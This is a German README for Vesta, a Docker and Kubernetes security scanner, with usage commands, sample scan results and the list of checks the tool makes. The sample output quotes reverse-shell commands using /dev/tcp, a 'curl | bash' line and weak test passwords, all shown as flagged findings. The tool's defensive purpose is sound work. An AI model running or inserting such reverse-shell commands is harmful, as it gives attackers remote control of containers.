
Ein Toolkit zur statischen Analyse von Schwachstellen und Docker- und Kubernetes-Clusterkonfigurationen, basierend auf realen Penetrationstests in der Cloud.
Ein Toolkit zur statischen Analyse von Schwachstellen und zur Erkennung von Docker- und Kubernetes-Clusterkonfigurationen, basierend auf realen Penetrationstests im Cloud Computing.
Vesta ist ein Toolkit zur statischen Analyse von Schwachstellen und zur Erkennung von Docker- und Kubernetes-Clusterkonfigurationen. Es überprüft Kubernetes- und Docker-Konfigurationen, Cluster-Pods und Container auf Sicherheitspraktiken.
Vesta ist ein flexibles Toolkit, das auf physischen Maschinen verschiedener Systemtypen (Windows, Linux, MacOS) ausgeführt werden kann.
Scannen
Docker
Kubernetes
Vesta ist mit Go 1.18 erstellt.```bash make build
## Schnellstart
Beispiel für einen Image- oder Container-Scan, verwenden Sie `-f` zur Eingabe einer tar-Datei, starten Sie vesta:```bash
# Container
vesta scan image cve-2019-14234_web:latest
vesta scan image -f example.tar
# Image
vesta scan container <CONTAINER ID>
vesta scan container -f example.tar
# Filesystem
vesta scan fs <path_of_filesystem>
Ouput:```bash 2022/11/29 22:50:00 Searching for image 2022/11/29 22:50:19 Begin upgrading vulnerability database 2022/11/29 22:50:19 Vulnerability Database is already initialized 2022/11/29 22:50:19 Begin to analyze the layer 2022/11/29 22:50:35 Begin to scan the layer
Detected 216 vulnerabilities
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 208 | python3.6 - Django | 2.2.3 | CVE-2019-14232 | 7.5 | high | An issue was discovered | | | | | | | | in Django 1.11.x before | | | | | | | | 1.11.23, 2.1.x before 2.1.11, | | | | | | | | and 2.2.x before 2.2.4. If | | | | | | | | django.utils.text.Truncator's | | | | | | | | chars() and words() methods | | | | | | | | were passed the html=True | | | | | | | | argument, t ... | +-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 209 | | 2.2.3 | CVE-2019-14233 | 7.5 | high | An issue was discovered | | | | | | | | in Django 1.11.x before | | | | | | | | 1.11.23, 2.1.x before 2.1.11, | | | | | | | | and 2.2.x before 2.2.4. | | | | | | | | Due to the behaviour of | | | | | | | | the underlying HTMLParser, | | | | | | | | django.utils.html.strip_tags | | | | | | | | would be extremely ... | +-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 210 | | 2.2.3 | CVE-2019-14234 | 9.8 | critical | An issue was discovered in | | | | | | | | Django 1.11.x before 1.11.23, | | | | | | | | 2.1.x before 2.1.11, and 2.2.x | | | | | | | | before 2.2.4. Due to an error | | | | | | | | in shallow key transformation, | | | | | | | | key and index lookups for | | | | | | | | django.contrib.postgres.f ... | +-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 211 | python3.6 - numpy | 1.24.2 | | 8.5 | high | Malicious package is detected in | | | | | | | | '/usr/local/lib/python3.6/site-packages/numpy/setup.py', | | | | | | | | malicious command "curl | bash" are | | | | | | | | detected. | +-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
Docker Histories: +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | ID | NAME | CURRENT/VULNERABLE VERSION | CVEID | SCORE | LEVEL | DESCRIPTION | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | 1 | Image History | - / - | - | 0.0 | high | Confusion value found | | | | | | | | in ENV: 'command' with | | | | | | | | the plain text 'bash -i | | | | | | | | >&/dev/tcp/127.0.0.1/9999 0>&1 | | | | | | | | '. | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | 2 | | - / - | - | 0.0 | medium | Docker history has found the | | | | | | | | senstive environment with | | | | | | | | key 'SECRET_KEY' and value: | | | | | | | | 123456. | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+
<details>
<summary>Ergebnis</summary>

</details>
Beispiel für docker config scan, start vesta:```bash
vesta analyze docker
Oder mit dokcer ausführen```bash make run.docker
Ausgabe:```bash
2022/11/29 23:06:32 Start analysing
2022/11/29 23:06:32 Getting engine version
2022/11/29 23:06:32 Getting docker server version
2022/11/29 23:06:32 Getting kernel version
Detected 3 vulnerabilities
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| ID | CONTAINER DETAIL | PARAM | VALUE | SEVERITY | DESCRIPTION |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 1 | Name: Kernel | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | ID: None | | | | the CVE-2022-0492 with |
| | | | | | CAP_SYS_ADMIN and v1 |
| | | | | | architecture of cgroups |
| | | | | | vulnerablility, has a |
| | | | | | potential container escape. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 2 | Name: vesta_vuln_test | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | ID: 207cf8842b15 | | | | the Dirty Pipe vulnerablility, |
| | | | | | has a potential container |
| | | | | | escape. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 3 | Name: Image Tag | Privileged | true | critical | There has a potential container|
| | ID: None | | | | escape in privileged module. |
| | | | | | |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 4 | Name: Image Configuration | Image History | Image name: | high | Weak password found |
| | ID: None | | vesta_history_test:latest | | | in command: ' echo |
| | | | Image ID: 4bc05e1e3881 | | 'password=test123456' > |
| | | | | | config.ini # buildkit'. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
Beispiel für Kubernetes-Konfigurationsscan, start vesta:```bash vesta analyze k8s
Ausgabe:```bash
2022/11/29 23:15:59 Start analysing
2022/11/29 23:15:59 Getting docker server version
2022/11/29 23:15:59 Getting kernel version
Detected 4 vulnerabilities
Pods:
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| ID | POD DETAIL | PARAM | VALUE | TYPE | SEVERITY | DESCRIPTION |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| 1 | Name: vulntest | Namespace: | sidecar name: vulntest | | true | Pod | critical | There has a potential |
| | default | Status: Running | | Privileged | | | | container escape in privileged |
| | Node Name: docker-desktop | | | | | module. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest | | Token:Password123456 | Sidecar EnvFrom | high | Sidecar envFrom ConfigMap has |
| | | env | | | | found weak password: |
| | | | | | | 'Password123456'. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: sidecartest | | MALWARE: bash -i >& | Sidecar Env | high | Container 'sidecartest' finds |
| | | env | /dev/tcp/10.0.0.1/8080 0>&1 | | | high risk content(score: |
| | | | | | | 0.91 out of 1.0), which is a |
| | | | | | | suspect command backdoor. |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| 2 | Name: vulntest2 | Namespace: | sidecar name: vulntest2 | | CAP_SYS_ADMIN | capabilities.add | critical | There has a potential |
| | default | Status: Running | | capabilities | | | | container escape in privileged |
| | Node Name: docker-desktop | | | | | module. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest2 | | true | kube-api-access-lcvh8 | critical | Mount service account |
| | | automountServiceAccountToken | | | | and key permission are |
| | | | | | | given, which will cause a |
| | | | | | | potential container escape. |
| | | | | | | Reference clsuterRolebind: |
| | | | | | | vuln-clusterrolebinding | |
| | | | | | | roleBinding: vuln-rolebinding |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest2 | | cpu | Pod | low | CPU usage is not limited. |
| | | Resource | | | | |
| | | | | | | |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
Configures:
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| ID | TYPEL | PARAM | VALUE | SEVERITY | DESCRIPTION |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 1 | K8s version less than v1.24 | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | | | | | the CVE-2022-0185 with |
| | | | | | CAP_SYS_ADMIN vulnerablility, |
| | | | | | has a potential container |
| | | | | | escape. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 2 | ConfigMap | ConfigMap Name: vulnconfig | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high | ConfigMap has found weak |
| | | Namespace: default | | | password: 'Password123'. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 3 | Secret | Secret Name: vulnsecret-auth | password:Password123 | high | Secret has found weak |
| | | Namespace: default | | | password: 'Password123'. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 4 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | high | Key permissions with key |
| | | vuln-clusterrolebinding | | create, update | resources: | | resources given to the |
| | | rolename: vuln-clusterrole | | pods, services | | default service account, which |
| | | kind: ClusterRole | subject | | | will cause a potential data |
| | | kind: Group | subject name: | | | leakage. |
| | | system:serviceaccounts:vuln | | | | |
| | | namespace: vuln | | | |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 5 | RoleBinding | binding name: vuln-rolebinding | verbs: get, watch, list, | high | Key permissions with key |
| | | | rolename: vuln-role | role | create, update | resources: | | resources given to the |
| | | kind: Role | subject kind: | pods, services | | default service account, which |
| | | ServiceAccount | subject name: | | | will cause a potential data |
| | | default | namespace: default | | | leakage. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 6 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | warning | Key permission are given |
| | | vuln-clusterrolebinding2 | | create, update | resources: | | to unknown user 'testUser', |
| | | rolename: vuln-clusterrole | | pods, services | | printing it for checking. |
| | | subject kind: User | subject | | | |
| | | name: testUser | namespace: | | | |
| | | all | | | |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+

$./vesta -h Vesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit Tutorial is available at https://github.com/kvesta/vesta
Usage: vesta [command]
Available Commands: analyze Kubernetes analyze completion Generate the autocompletion script for the specified shell help Help about any command scan Container scan update Update vulnerability database version Print version information and quit
Flags: -h, --help help for vesta
## Veranstaltung
### KCon 2023 Waffenliste
- [https://kcon.knownsec.com/index.php?s=bqp&c=category&id=2](https://kcon.knownsec.com/index.php?s=bqp&c=category&id=2)
| Unterstützt | Prüfpunkt | Beschreibung | Schweregrad | Referenz |
|---|
| ✔ | PrivilegeAllowed | Privilegiertes Modul ist zugelassen. | critical | Ref |
| ✔ | Capabilities | Gefährliche Capabilities sind geöffnet. | critical | Ref |
| ✔ | Volume Mount | Mountet gefährliche Speicherorte. | critical | Ref |
| ✔ | Docker Unauthorized | Port 2375 ist geöffnet und nicht autorisiert. | critical | Ref |
| ✔ | Kernel version | Kernelversion liegt unter der Escape-Version. | critical | Ref |
| ✔ | Network Module | Netzwerkmodul ist host und containerd-Version unter 1.41. | critical/medium | |
| ✔ | Pid Module | Pid-Modul ist host. | high | |
| ✔ | Docker Server version | Serverversion enthält eine anfällige Version. | critical/high/medium/low | |
| ✔ | Docker env password check | Überprüft schwache Passwörter in der Datenbank. | high/medium | |
| ✔ | Docker History | Docker-Layer und -Umgebung enthalten einige gefährliche Befehle. | high/medium | |
| ✔ | Docker Backdoor | Docker-Env-Befehl enthält bösartige Befehle. | critical/high | |
| ✔ | Docker Swarm | Docker-Swarm hat gefährliche Konfigurationen oder Geheimnisse, oder Container sind unsicher. | medium/low | |
| ✔ | Docker supply chain | Docker-Lieferkette hat anfällige Konfigurationen | critical/high/medium | Ref |
| Unterstützt | Prüfpunkt | Beschreibung | Schweregrad | Referenz |
|---|
| ✔ | PrivilegeAllowed | Privilegiertes Modul ist zugelassen. | critical | Ref |
| ✔ | Capabilities | Gefährliche Capabilities sind geöffnet. | critical | Ref |
| ✔ | PV and PVC | PV ist auf gefährlichem Speicherort gemountet und aktiv. | critical/medium | Ref |
| ✔ | RBAC | RBAC hat einige unsichere Konfigurationen in clusterrolebingding oder rolebinding. | high/medium/low/warning | |
| ✔ | Kubernetes-dashborad | Überprüft -enable-skip-login und Kontoberechtigungen. | critical/high/low | Ref |
| ✔ | Kernel version | Kernelversion liegt unter der Escape-Version. | critical | Ref |
| ✔ | Docker Server version (k8s Versionen unter v1.24) | Serverversion enthält eine anfällige Version. | critical/high/medium/low | |
| ✔ | Kubernetes-Zertifikatsablauf | Zertifikat läuft nach 30 Tagen ab. | medium | |
| ✔ | ConfigMap und Secret-Überprüfung | Überprüft schwache Passwörter in ConfigMap oder Secret. | high/medium/low | Ref |
| ✔ | PodSecurityPolicy-Überprüfung (k8s Version unter v1.25) | PodSecurityPolicy toleriert gefährliche Pod-Konfigurationen. | high/medium/low | Ref |
| ✔ | Auto Mount ServiceAccount Token | Mountet das standardmäßige Service-Token. | critical/high/medium/low | Ref |
| ✔ | NoResourceLimits | Keine Ressourcenlimits festgelegt. | low | Ref |
| ✔ | Job und Cronjob | Kein seccomp oder seLinux sind in Job oder CronJob gesetzt. | low | Ref |
| ✔ | Envoy admin | Envoy-Admin ist geöffnet und hört auf 0.0.0.0. | high/medium | Ref |
| ✔ | Cilium version | Cilium hat eine anfällige Version. | critical/high/medium/low | Ref |
| ✔ | Istio-Konfigurationen | Istio hat eine anfällige Version und anfällige Konfigurationen. | critical/high/medium/low | Ref |
| ✔ | Kubelet 10250/10255 und Kubectl proxy | Port 10255/10250 ist geöffnet und nicht autorisiert, oder Kubectl-Proxy ist geöffnet. | high/medium/low | |
| ✔ | Etcd-Konfiguration | Überprüfung der sicheren Etcd-Konfiguration. | high/medium | |
| ✔ | Sidecar-Konfigurationen | Sidecar hat einige gefährliche Konfigurationen. | critical/high/medium/low | |
| ✔ | Pod-Annotation | Pod-Annotation hat einige unsichere Konfigurationen. | high/medium/low/warning | Ref |
| ✔ | DaemonSet | DaemonSet hat unsichere Konfigurationen. | critical/high/medium/low | |
| ✔ | Backdoor | Erkennung von Hintertüren. | critical/high | Ref |
| ✔ | Laterale Adminbewegung | Pod gibt einen Masterknoten an. | medium/low |